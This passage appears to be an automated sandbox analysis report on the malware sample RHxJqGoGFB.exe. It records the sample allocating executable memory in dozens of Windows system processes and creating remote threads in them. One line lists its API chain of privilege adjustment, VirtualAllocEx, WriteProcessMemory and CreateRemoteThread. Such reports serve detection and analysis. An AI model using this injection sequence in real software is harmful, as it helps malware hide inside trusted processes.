        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 180000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 300000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 440000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 390000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 770000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 970000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3430000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 310000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 450000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3450000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 460000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3460000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 470000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 840000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: C90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: CA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 1290000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 12A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: F60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: F70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 13B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 790000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 7A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: E00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: E50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 15A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 15F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 700000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 710000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1340000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1390000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1310000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 690000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 6A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: F10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: F20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 5A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 850000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: F80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: F90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: A10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1050000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1060000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: DB0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 14C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 580000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 590000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 920000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 520000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 530000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 4F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 500000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 860000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1140000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread created: unknown EIP: 1150000Jump to behavior
